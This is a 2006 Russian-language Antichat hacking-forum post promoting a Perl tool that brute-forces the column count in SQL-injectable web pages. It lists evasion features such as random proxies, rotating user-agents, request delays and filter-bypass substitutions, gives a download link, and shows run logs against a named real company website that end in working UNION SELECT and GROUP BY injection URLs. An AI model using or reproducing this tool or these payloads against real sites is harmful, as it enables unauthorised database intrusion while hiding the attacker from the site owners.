Форум АНТИЧАТ - Antichat SQL-tools

Antichat SQL-tools

03.12.2006, 23:03

~~Elekt~~

Banned

Регистрация: 05.12.2005

Сообщений: 982

Провел на форуме:
4839935

Репутация: 1202

Отправить сообщение для Elekt с помощью ICQ

Antichat SQL-tools

Antichat SQL-tools for check columns v.1.1.1
Скрипт для подбора числа столбцов в БД.

Основная функция:
- подбор числа столбцов

Обращаю ваше внимание, что консольная и гуи одной версии практически аналогичны по фунциональности.

v1.1.1(25.11.2006) - новое: по просьбам телезрителей: вывел куки, добавил работу через сокет
- фикс: забыл поставит chomp() при загрузке проксей и user-agent...
- новое: вывел дата+время атаки
v1.1.0(15.10.2006) - новое: GUI-интерфейс!
- новое: эвристическое определение необходимых параметров
- фикс: Win\Nix-совместимость
v1.0.9(12.10.2006) - новое: прокси - рэндомный выбор из файла
- новое: юзер-агент - рэндомный выбор из файла
- новое: случайное\фиксированное время задержки между запросами
- оптимизация кода и алгоритмов
v1.0.8(10.10.2006) - фикс: исправил грубую ошибку в работе пост-запросом
v1.0.7(30.09.2006) - оптимизация кода
v1.0.6(17.07.2006) - фикс: переработан механизм перебора для GROUP и ORDER, что уменьшает число запросов + экономит трафик.
v1.0.5(31.08.2006) - новое: логирование результата
v1.0.4 - мелкая оптимизация, правка багов, автоматизация
v1.0.3 - новое: на выбор три типа перебора - union, group by и order by(Greets ZaCo)
- новое: добавил getopts. Теперь удобно указывать параметры
- новое: возможность указать начальное и конечное число столбцов.
- новое: поддержка прокси
- новое: рабочий POST или GET запрос
v1.0.2 - новое: что подставлять в столбцы - цифры или null'ы
- новое: альтернативная замена пробелов
- новое: альтернативная замена коментов
- новое: защита от дурака + хелп
v1.0.1 - новое: автовыход при найденных столбцах(ориентир - по отсутствию указанной вами ошибке)
v1.0.0(19.06.2006) - Увидел cкрипт Форба(10 строк). Появилось желание доработать.

Скачать: http://sec-123.narod.ru/public/sql_check_public.rar

Выдержка из хелпа:

Код:

Options:
-u - путь к сайту с уязвимым скриптом, например http://site.com/index.php?user=-1'))
-a - строка с ошибкой неправильного числа столбцов, по её отсутствию в верном запросе определяется конец перебора
-n - с какого столбца начнём брут?
-N - до какакого столбца будем брутить?
-m - способ подбора: UNION SELECT, GROUP BY, ORDER BY. Быстрее работает group и order, но надёжнее union.
-s - разделитель между операторами. Иногда пробел фильтруецца - юзаем многочисленные его альтернативы.
-z - столбцы при union-методе можно перечислять цифрами(1,2,3..), а можно нулами(null)
-c - комменты в конце выражения. Для mysql характерно "/*" , а для mssql "--"
-g - работа через гет или пост-запросы
-t - время задержки. выдерживается пауза при каждом запросе. RAND - случайная от 0 до 10
-b - юзер-агент. выбирается случайный юзер-агент при каждом запросе
-p - файл с проксями. выбирается случайная прокся при каждом запросе
-l - логирование работы в файл

Алармы.

Внимание! Файл лога сохраняется в папку, из которой был запущен родитель процеса перл(для виндв - cmd.exe).
Рекомендую создать в папке со скриптом bat-файл с содержимым "cmd.exe".

Внимание! GUI(TK) под никсами выглядит не очень красиво =)

Протестить на сайте:

Код:

C:\sql-check.pl -u "http://www.comstar.ru/press-center/news/?month=10&year=2004"

Лог работы:

Код:

=========_Script_Brut_Columns_========
 
*URL:___________http://www.comstar.ru/press-center/news/?month=10&year=2004
 Evristic:______ON
 Min_colomns:___1
 Max_colomns:___50
 Metod:_________UNION
 SPACE:_________%20
 NULL:__________1
 POST-GET:______GET
 Time(sleep):___0
 User-Agent:____useragent.txt
 PROXY:_________proxy.txt
 Log:___________log.txt

=========_Script_Brut_Columns_========

GO!

Start evristic detection.
 Please, WAIT...


Detect MySQL

Start UNION
Please Wait...

 Try 1 column... NOT FOUND =( 
 Try 2 column... NOT FOUND =( 
 Try 3 column... NOT FOUND =( 
 Try 4 column... NOT FOUND =( 
 Try 5 column... NOT FOUND =( 
 Try 6 column... NOT FOUND =( 
 Try 7 column... NOT FOUND =( 
 Try 8 column... NOT FOUND =( 
 Try 9 column... NOT FOUND =( 
 Try 10 column... NOT FOUND =( 
 Try 11 column... 
 ------------------------

 OK!  Find 11 columns. 

 Right URL:
 http://www.comstar.ru/press-center/news/?month=10&year=2004%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11/*

Код:

=========_Script_Brut_Columns_========
 
*URL:___________http://www.comstar.ru/press-center/news/?month=10&year=2004
 Evristic:______ON
 Min_colomns:___1
 Max_colomns:___50
 Metod:_________GROUP
 SPACE:_________%20
 NULL:__________1
 POST-GET:______GET
 Time(sleep):___0
 User-Agent:____useragent.txt
 PROXY:_________proxy.txt
 Log:___________log.txt

=========_Script_Brut_Columns_========

GO!

Start evristic detection.
 Please, WAIT...


Detect MySQL

Start GROUP
Please Wait...

 Try 25 column...  ok!
 Try 13 column...  ok!
 Try 7 column...  no...
 Try 10 column...  no...
 Try 10 column...  ok!
 Try 11 column...  ok!
 Try 12 column... 

------------------------

 OK! Find 11 columns. 

 Right URL:
 http://www.comstar.ru/press-center/news/?month=10&year=2004%20GROUP%20BY%2012/*

Вложения

sql_check_public.rar.zip (18.1 Кб, 398 просмотров)